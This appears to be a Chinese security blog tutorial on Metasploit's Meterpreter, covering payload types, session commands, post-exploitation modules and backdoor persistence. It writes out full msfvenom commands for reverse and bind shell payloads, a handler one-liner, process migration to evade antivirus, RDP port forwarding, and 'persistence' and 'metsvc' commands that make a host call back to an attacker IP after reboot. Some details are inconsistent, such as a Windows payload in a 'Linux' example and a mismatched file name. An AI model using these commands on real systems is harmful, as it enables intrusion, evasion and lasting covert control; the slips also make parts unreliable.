文章总结： 本文详细介绍了Metasploit框架中Meterpreter后渗透模块的使用方法，涵盖基础概念、技术优势、四种常用Shell类型（reversetcp、reversehttp、reversehttps、bindtcp）的生成与连接步骤，以及文件操作、网络配置、系统管理等核心命令解析。重点演示了后渗透模块实战应用，包括信息收集、权限提升、漏洞扫描和持久化后门植入（persistence与metsvc模块），为渗透测试人员提供完整的操作指南和可执行建议。 综合评分： 78 文章分类： 渗透测试,红队,内网渗透,安全工具,实战经验

---

后渗透Meterpreter模块的详细使用

原创

小智 小智

智榜样网络安全学习中心

2026年5月5日 14:09 湖南

在小说阅读器读本章

去阅读

在渗透测试的完整流程中，拿到目标主机的初始权限只是第一步，真正的关键操作往往在后渗透阶段。Metasploit框架作为渗透测试的常用工具，其内置的Meterpreter是后渗透阶段的强力助手，能帮我们完成隐蔽的远程控制、信息收集、权限提升等一系列操作。本文就带大家全面了解Meterpreter，从基础概念到常用命令、模块使用，帮你快速掌握这款工具的实用技巧。

一、初识Meterpreter

1.1 什么是Meterpreter

Meterpreter是Metasploit框架中的扩展攻击载荷，当漏洞利用成功后，它会在目标主机内存中创建一个隐蔽的控制通道，让我们获得目标主机的Meterpreter会话。不同于普通的Shell，Meterpreter集成了大量实用功能，比如添加系统用户、捕获屏幕画面、记录键盘输入、上传下载远程文件、执行系统命令、获取系统信息、查看网络接口与IP地址等。

它的隐蔽性极强：不会修改目标主机硬盘中的任何文件，基于主机的入侵检测系统（HIDS）很难识别到它的存在；运行时会动态调整内存占用，经验丰富的人员也很难快速定位并终止它；同时还支持同时创建多个会话，方便我们同时控制多台目标主机。

1.2 Meterpreter的技术优势

Meterpreter的优势主要体现在三个方面： 1、多平台支持：覆盖Windows、Linux等主流操作系统，同时适配x86、x64架构，还提供了PHP和Java语言的实现版本，适配更多场景。 2、隐蔽性拉满：全程在内存中运行，不会在硬盘留下入侵痕迹，普通杀毒软件很难检测到它的存在，大幅降低了被发现的概率。 3、扩展性强：支持通过Ruby脚本进行自定义扩展，我们可以根据需求编写专属的攻击脚本，拓展Meterpreter的功能边界。

二、Meterpreter常用的Shell类型

Meterpreter支持多种不同的连接方式，适配不同的网络环境，下面介绍四种最常用的类型：

2.1 reverse_tcp（TCP反弹Shell）

这是最基础的反弹连接Shell，原理是目标主机主动向我们的攻击机发起TCP连接，适合外网渗透场景。下面以Linux和Windows系统为例演示生成方法：

Linux系统

使用msfvenom命令生成Linux反弹载荷木马，命令如下：

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.128 lport=4444 -f elf > shell.elf

执行命令后会在当前目录生成名为isshell的木马文件，如下图所示：

image-20260420184202257

接下来给木马文件添加执行权限：

chmod +x shell.elf
./shell.elf

操作完成后如下图：

image-20260420185808198

然后打开Metasploit框架，使用handler监听模块，设置的payload要和生成木马时一致：

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.0.128; set LPORT 4444; exploit -j -z"

设置攻击机IP和监听端口：

set lhost 192.168.1.102
set lport 4444

启动监听：

run

最后在目标主机上运行木马文件，就能成功反弹回Meterpreter会话，操作界面如下图：

image-20260421202652382

Windows系统

生成Windows反弹木马的命令如下：

msfvenom -p windows/meterpreter/bind_tcp  LPORT=4444 -f exe -o shell.exe

后续的监听步骤和Linux类似，不再重复演示。

2.2 reverse_http（HTTP反弹Shell）

基于HTTP协议的反向连接Shell，使用80端口进行通信，适合绕过目标主机的基础防火墙规则，因为80端口通常处于开放状态。不过这种方式在网络速度较慢时稳定性较差，容易出现连接中断的情况，对应的payload为windows/meterpreter/reverse_http。

2.3 reverse_https（HTTPS反弹Shell）

基于HTTPS协议的反向连接Shell，使用443端口通信，相比reverse_http，它的通信数据经过加密，更难被流量监测工具识别，同样在网络速度较慢时稳定性一般，对应的payload为windows/meterpreter/reverse_https。

2.4 bind_tcp（TCP正向Shell）

这是一种正向连接的Shell，不需要设置攻击机IP，由攻击机主动连接目标主机的指定端口，适合内网跨网段的渗透场景。下面以Linux系统为例演示： 使用msfvenom生成正向连接木马：

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe

生成的木马文件如下图：

image-20260413171633795

给木马添加执行权限后运行，攻击机只需要直接连接目标主机的IP和4444端口即可获取会话，不需要提前设置监听地址。

三、Meterpreter常用命令详解

拿到Meterpreter会话后，我们可以通过内置的命令完成各种操作，下面按功能分类介绍常用命令：

3.1 基础控制命令

这类命令用于管理Meterpreter会话本身：

1、background：将当前会话放入后台运行，方便我们切换到其他会话进行操作

2、sessions -i [会话编号]：切换到指定编号的会话，比如sessions -i 1就是切换到第一个会话

3、quit：退出当前Meterpreter会话

4、shell：获取目标主机的原生Shell，比Meterpreter原生命令更贴合系统原生操作习惯

5、irb：打开Ruby终端，允许我们直接执行Ruby脚本，拓展Meterpreter的功能

3.2 文件系统操作命令

用于在目标主机和本地之间传输文件，以及管理目标主机的文件系统：

1、cat [文件路径]：查看目标主机上指定文件的内容，比如cat /etc/passwd查看Linux系统的用户列表

2、getwd：查看当前所在的工作目录

3、upload [本地文件路径] [目标路径]：将本地文件上传到目标主机的指定路径

4、download [目标文件路径] [本地保存路径]：将目标主机上的文件下载到本地

5、edit [文件路径]：使用内置编辑器修改目标主机上的文件

6、search [搜索参数]：搜索目标主机上的文件，比如search -f *.docx搜索所有docx文档

3.3 网络操作命令

用于查看目标主机的网络信息，以及配置端口转发：

1、ipconfig（Windows）/ifconfig（Linux）：查看目标主机的网络接口、IP地址、MAC地址等信息

2、portfwd add -l [本地监听端口] -p [目标端口] -r [目标IP]：配置端口转发，将目标主机的指定端口转发到本地，比如portfwd add -l 4444 -p 3389 -r 192.168.1.102，就是将目标主机的3389远程桌面端口转发到本地的4444端口

3、rdesktop -u [用户名] -p [密码] [本地IP:端口]：通过转发的端口连接目标主机的远程桌面，比如rdesktop -u Administrator -p 123456 127.0.0.1:4444

4、route：查看目标主机的路由表信息，方便我们进行跳板攻击

3.4 系统操作命令

用于管理目标主机的进程和系统信息：

1、ps：查看目标主机当前运行的所有活跃进程

2、migrate [进程ID]：将当前Meterpreter会话迁移到指定PID的进程中，比如迁移到系统核心进程或杀毒软件进程，躲避查杀

3、execute -H -i -f [程序路径]：在目标主机上执行指定程序，其中-H参数表示隐藏窗口，-i参数表示开启交互模式，比如execute -H -i -f cmd.exe打开隐藏的cmd窗口

4、getpid：查看当前Meterpreter会话所在的进程ID

5、kill [进程ID]：终止目标主机上的指定进程

6、getuid：查看当前会话拥有的系统权限

7、sysinfo：查看目标主机的系统信息，包括主机名、操作系统版本、架构等

8、shutdown：关闭目标主机，请不要在正式测试中随意使用该命令

四、后渗透攻击模块使用

在拿到目标主机的Meterpreter会话后，我们可以使用Metasploit的后渗透攻击模块完成更复杂的操作，比如信息收集、权限提升、跳板攻击等。

4.1 什么是后渗透攻击模块

后渗透攻击模块是Metasploit v4版本引入的专属模块类型，专门用于在获取目标主机远程控制权后，执行各类后续攻击动作，帮助我们进一步扩大战果，比如收集敏感信息、横向移动、持久化控制等。

4.2 模块实现原理

后渗透攻击模块大多使用Ruby语言编写，但目标主机通常不会预装Ruby解释器，那它是如何运行的呢？其实是由本地的Meterpreter客户端解释脚本代码，然后调用运行在目标主机上的Meterpreter服务端提供的API来执行操作，不需要目标主机安装额外的依赖环境。

4.3 实战演示

1、首先将进入Meterpreter会话

2、搜索enum_drives模块，输入run post/windows/gather/enum_drives，就能获取获取目标分区情况

image-20260421203334930

3、检测是否使虚拟主机

run post/windows/gather/checkvm

img

4、获取当前安装的应用程序

run post/windows/gather/enum_applications

image-20260421203534960

5、获取用户登录信息

run post/windows/gather/enum_logged_on_users

image-20260421203606511

有了用户登录的信息，可以考虑横向移动等等操作

6、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

image-20260421203715558

可以通过扫描出来的模块，进行漏洞利用，获取系统的最高权限

7、收集系统环境信息

run post/multi/gather/env

image-20260421203751307

8、查看开启的服务

run post/windows/gather/enum_services

image-20260421203907937

9、查看目标主机最近的操作

run post/windows/gather/dumplinks

image-20260421203952203

五、持久化后门植入方法

Meterpreter是基于内存运行的，一旦目标主机重启，会话就会失效，无法继续控制目标主机。为了长期获取控制权，我们需要植入持久化后门，下面介绍两种常用方法：

5.1 persistence模块

persistence模块是最常用的持久化后门模块，可以将Meterpreter设置为开机自启动，具体使用步骤如下： 在Meterpreter会话中输入以下命令：

run persistence -X -i 60 -p 4444 -r 192.168.1.102

参数说明：

• -X：指定后门开机自启动
• -i：设置反向连接的时间间隔，单位为秒
• -p：设置监听端口
• -r：设置攻击机的IP地址 执行完成后，只需要等待目标主机重启，就会自动向攻击机发起连接，我们可以使用handler模块监听端口，等待后门上线，监听界面如下图：

image-20260421203034746

5.2 metsvc模块

metsvc模块会将Meterpreter封装为系统服务安装到目标主机上，会上传三个核心文件：metsvc.dll、metsvc-service.exe、metsvc.exe。使用方法非常简单，只需要在Meterpreter会话中输入：

run metsvc

执行后，目标主机就会开启Meterpreter服务，监听指定端口等待攻击机连接，我们可以在本地使用handler模块连接该服务，获取持久化会话。

image-20260421203120824

结束语

通过本文的介绍，相信你已经对Meterpreter有了全面的了解，从基础概念到常用命令、模块使用，再到持久化后门的搭建，掌握这些内容可以帮助你在后渗透阶段更高效地完成渗透测试工作。如果在使用过程中遇到问题，欢迎在评论区留言交流，也期待大家指出文中的不足，共同进步。

🎁 互动与福利

分享本文到朋友圈，点赞+在看+关注，一键三联，可以凭截图找老师领取

上千学习资料+工具哦

22919c6e4ef945aa9a9cbf0f6df4f6ff

分享后扫码加我！

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：智榜样网络安全学习中心 小智 小智《后渗透Meterpreter模块的详细使用》